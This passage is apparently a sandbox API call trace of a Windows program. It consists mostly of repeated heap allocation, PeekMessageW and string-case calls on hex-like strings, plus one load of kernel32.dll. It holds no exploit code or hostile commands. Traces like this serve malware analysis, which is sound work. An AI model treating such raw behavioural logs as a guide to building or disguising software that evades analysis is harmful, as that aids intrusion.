dwFlags=0x0, lpMem=0x24b12f8 | out: hHeap=0x25c0000) returned 1 [0145.347] lstrlenW (lpString="6E") returned 2 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9480 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1308 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b12d8 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9450 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93a8 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12e8 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12d8 | out: hHeap=0x25c0000) returned 1 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9438 | out: hHeap=0x25c0000) returned 1 [0145.347] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.347] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b12d8 [0145.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0145.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12f8 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12f8 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b12f8 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9480 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a93f0 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a92a0 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9498 | out: hHeap=0x25c0000) returned 1 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1308 | out: hHeap=0x25c0000) returned 1 [0145.348] lstrlenW (lpString="6F") returned 2 [0145.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9468 | out: hHeap=0x25c0000) returned 1 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.348] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.349] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.352] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.370] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.371] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.372] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.373] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.374] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.374] CharUpperBuffW (in: lpsz="Compiled", cchLength=0x8 | out: lpsz="COMPILED") returned 0x8 [0145.374] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.374] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0145.374] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76c20000 [0145.375] FreeLibrary (hLibModule=0x76c20000) returned 1 [0145.375] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1158 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9540 [0145.375] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1388 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9588 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9438 [0145.375] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94c8 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1388 [0145.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.376] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13a8 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9510 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94e0 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1068 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a92a0 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a94c8 [0145.376] CharLowerBuffW (in: lpsz="Byte[4]", cchLength=0x7 | out: lpsz="byte[4]") returned 0x7 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0145.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9498 [0145.376] 